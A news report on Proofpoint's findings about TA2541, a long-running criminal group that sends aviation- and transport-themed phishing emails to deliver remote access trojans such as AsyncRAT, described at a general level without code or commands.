An unknown criminal hacking group is targeting organisations in the aviation, aerospace, defence, transportation and manufacturing industries with trojan malware, in attacks that researchers say have been going on for years.
Dubbed TA2541 and detailed by cybersecurity researchers at Proofpoint, the persistent cyber-criminal operation has been active since 2017 and has compromised hundreds of organisations across North America, Europe, and the Middle East.
Despite running for years, the attacks have barely evolved, broadly following the same targeting and themes in which attackers remotely control compromised machines, conduct reconnaissance on networks and steal sensitive data.
SEE: A winning strategy for cybersecurity (ZDNet special report)
"What's noteworthy about TA2541 is how little they've changed their approach to cybercrime over the past five years, repeatedly using the same themes, often related to aviation, aerospace, and transportation, to distribute remote access trojans," said Sherrod DeGrippo, vice president of threat research and Detection at Proofpoint.
"This group is a persistent threat to targets throughout the transportation, logistics, and travel industries."
Attacks begin with phishing emails designed to be relevant to individuals and businesses in the sectors being targeted. For example, one lure sent to targets in aviation and aerospace resembles requests for aircraft parts, while another is designed to look like an urgent request for air ambulance flight details. At one point, the attackers introduced COVID-19-themed lures, although these were soon dropped.
While the lures aren't highly customised and follow regular templates, the sheer number of messages sent over the years – hundreds of thousands in total – and their implied urgency will be enough to fool victims into downloading malware. The messages are nearly always in English.
TA2541 initially sent emails containing macro-laden Microsoft Word attachments that downloaded the Remote Access Trojan (RAT) payload, but the group has recently shifted to using Google Drive and Microsoft OneDrive URLs, which lead to an obfuscated Visual Basic Script (VBS) file.
Interacting with these files – the names of which follow similar themes to the initial lures – will leverage PowerShell functions to download malware onto compromised Windows machines.
The cyber criminals have distributed over a dozen different trojan malware payloads since the campaigns began, all of which are available to buy on dark web forums or can be downloaded from open-source repositories.
Currently, the most commonly delivered malware in TA2541 campaigns is AsyncRAT, but other popular payloads include NetWire, WSH RAT and Parallax.
No matter which malware is delivered, it's used to gain remote control of infected machines and steal data, although researchers note that they still don't know what the ultimate goal of the group is, or where they are operating from.
The campaign is still active and it's been warned that the attackers will continue to distribute phishing emails and deliver malware to victims around the world.